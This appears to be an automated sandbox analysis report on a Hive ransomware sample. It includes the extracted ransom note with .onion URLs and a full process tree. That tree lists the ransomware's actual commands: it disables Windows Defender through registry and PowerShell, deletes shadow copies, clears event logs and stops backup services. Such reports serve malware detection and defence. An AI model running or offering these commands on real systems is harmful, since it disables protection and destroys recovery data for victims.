Analysis

  • max time kernel
    133s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    23-11-2021 16:59

General

  • Target

    5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

  • Size

    2.5MB

  • MD5

    80174956b0d1849ee802490817a2748f

  • SHA1

    8b6648922a6d2bb1ccb419273814387940ad9fcb

  • SHA256

    5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584

  • SHA512

    0b2191126fc2d1f49561439c8e790b67820af86ecad9736c8b44f50a0b4bf7f63a5d7ab7610523ce99c15d208baa43f054afbf0c66f469523b87be1b70f75073

Malware Config

Extracted

Path

C:\b8Bo_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: K61rvptCkHNr Password: vnCCQBqnH1iDfrYcrYwd To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.accuj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:984
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:612
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:916
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2016
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:2004
          • C:\Windows\SysWOW64\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:1056
            • C:\Windows\SysWOW64\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1096
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:1324
              • C:\Windows\SysWOW64\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1772
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:1008
                • C:\Windows\SysWOW64\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1804
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1632
                  • C:\Windows\SysWOW64\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:932
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:1760
                    • C:\Windows\SysWOW64\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                        PID:1748
                      • C:\Windows\SysWOW64\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:536
                        • C:\Windows\SysWOW64\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:1496
                          • C:\Windows\SysWOW64\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:592
                            • C:\Windows\SysWOW64\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:912
                              • C:\Windows\SysWOW64\sc.exe
                                sc.exe config "VSS" start= disabled
                                2⤵
                                  PID:1984
                                • C:\Windows\SysWOW64\sc.exe
                                  sc.exe config "wbengine" start= disabled
                                  2⤵
                                    PID:1540
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc.exe config "WebClient" start= disabled
                                    2⤵
                                      PID:1624
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                      2⤵
                                        PID:1372
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                        2⤵
                                          PID:1408
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                          2⤵
                                            PID:1532
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:1992
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                              2⤵
                                                PID:1056
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:980
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:1556
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:1212
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:1912
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:1896
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:1900
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:1920
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                              2⤵
                                                                PID:1712
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                2⤵
                                                                  PID:1644
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:1596
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:1696
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                      2⤵
                                                                        PID:1368
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                        2⤵
                                                                          PID:2012
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                          2⤵
                                                                            PID:1824
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                            2⤵
                                                                              PID:1560
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                              2⤵
                                                                                PID:360
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                2⤵
                                                                                  PID:2040
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                  2⤵
                                                                                    PID:1336
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                    2⤵
                                                                                      PID:1860
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                      2⤵
                                                                                        PID:1884
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                        2⤵
                                                                                          PID:1364
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                            PID:1080
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            2⤵
                                                                                              PID:1572
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              2⤵
                                                                                                PID:1672
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:1632
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:1716
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                    • Modifies security service
                                                                                                    PID:1916
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                      PID:1720
                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                      vssadmin.exe delete shadows /all /quiet
                                                                                                      2⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:1216
                                                                                                    • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                      wevtutil.exe cl system
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1732
                                                                                                    • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                      wevtutil.exe cl security
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1944
                                                                                                    • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                      wevtutil.exe cl application
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1612
                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                      wmic.exe SHADOWCOPY /nointeractive
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1948
                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                      wmic.exe shadowcopy delete
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1120
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                      2⤵
                                                                                                        PID:960
                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                          3⤵
                                                                                                          • Deletes Windows Defender Definitions
                                                                                                          PID:432
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                        2⤵
                                                                                                          PID:1516
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:964
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                          2⤵
                                                                                                            PID:2108
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                              3⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2128
                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                            notepad.exe C:\b8Bo_HOW_TO_DECRYPT.txt
                                                                                                            2⤵
                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                            PID:2392
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe"
                                                                                                            2⤵
                                                                                                              PID:2400
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping.exe -n 5 127.0.0.1
                                                                                                                3⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:2428

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Execution

                                                                                                          Command-Line Interface

                                                                                                          1
                                                                                                          T1059

                                                                                                          Persistence

                                                                                                          Modify Existing Service

                                                                                                          2
                                                                                                          T1031

                                                                                                          Defense Evasion

                                                                                                          Impair Defenses

                                                                                                          1
                                                                                                          T1562

                                                                                                          Modify Registry

                                                                                                          2
                                                                                                          T1112

                                                                                                          Disabling Security Tools

                                                                                                          1
                                                                                                          T1089

                                                                                                          Indicator Removal on Host

                                                                                                          1
                                                                                                          T1070

                                                                                                          File Deletion

                                                                                                          2
                                                                                                          T1107

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          1
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          1
                                                                                                          T1005

                                                                                                          Impact

                                                                                                          Inhibit System Recovery

                                                                                                          2
                                                                                                          T1490

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                                                            MD5

                                                                                                            03f89b7b085750d8964f666e79c8ca75

                                                                                                            SHA1

                                                                                                            744239ec00ba92348868648f8977eafcbe220db3

                                                                                                            SHA256

                                                                                                            5bad5a31a2416b47eb23d189dca2727fbe4ab016d5bf849748af8adb3df66e19

                                                                                                            SHA512

                                                                                                            7c755ad73eed2a5a1a67fa7b6013ef576447883dca751be0282a61ffbf5569ccc6989dd0eedb12ba5bb31965cbfd46107f017294c196d826e36eb1cf82b0beab

                                                                                                          • C:\b8Bo_HOW_TO_DECRYPT.txt
                                                                                                            MD5

                                                                                                            0bfd67750d847c7d40fd665231d801c3

                                                                                                            SHA1

                                                                                                            1d6e2b795fa346ded4f6ae6f7400633d858daa8e

                                                                                                            SHA256

                                                                                                            b3ece1708e325095f23e9cf8563ab4ee467896dccfef3d432a85ed3541bf1b7e

                                                                                                            SHA512

                                                                                                            0e7a7de20e7912f9aa11380ef7b300a4ca799d2a71baefca130e6db89e72e036565facb5269fc4061bd59a7ad0f3bc429aac7f5f1366500274fca0bb5abfd0da

                                                                                                          • memory/360-99-0x0000000000000000-mapping.dmp
                                                                                                          • memory/536-72-0x0000000000000000-mapping.dmp
                                                                                                          • memory/592-74-0x0000000000000000-mapping.dmp
                                                                                                          • memory/612-57-0x0000000000000000-mapping.dmp
                                                                                                          • memory/912-75-0x0000000000000000-mapping.dmp
                                                                                                          • memory/916-58-0x0000000000000000-mapping.dmp
                                                                                                          • memory/932-69-0x0000000000000000-mapping.dmp
                                                                                                          • memory/960-118-0x0000000000000000-mapping.dmp
                                                                                                          • memory/964-121-0x00000000023C0000-0x000000000300A000-memory.dmp
                                                                                                            Filesize

                                                                                                            12.3MB

                                                                                                          • memory/964-120-0x00000000023C0000-0x000000000300A000-memory.dmp
                                                                                                            Filesize

                                                                                                            12.3MB

                                                                                                          • memory/964-119-0x0000000075901000-0x0000000075903000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/964-122-0x00000000023C0000-0x000000000300A000-memory.dmp
                                                                                                            Filesize

                                                                                                            12.3MB

                                                                                                          • memory/980-84-0x0000000000000000-mapping.dmp
                                                                                                          • memory/984-56-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1008-66-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1056-83-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1056-62-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1080-105-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1096-63-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1120-117-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1204-61-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1212-86-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1216-112-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1220-55-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1324-64-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1336-101-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1364-104-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1368-95-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1372-79-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1408-80-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1496-73-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1532-81-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1540-77-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1556-85-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1560-98-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1572-106-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1596-93-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1612-115-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1624-78-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1632-108-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1632-68-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1644-92-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1672-107-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1696-94-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1712-91-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1716-109-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1720-111-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1732-113-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1748-71-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1760-70-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1772-65-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1804-67-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1824-97-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1860-102-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1884-103-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1896-88-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1900-89-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1912-87-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1916-110-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1920-90-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1944-114-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1948-116-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1984-76-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1992-82-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2004-60-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2012-96-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2016-59-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2040-100-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2128-125-0x0000000002390000-0x0000000002391000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2128-126-0x0000000002391000-0x0000000002392000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2128-127-0x0000000002392000-0x0000000002394000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB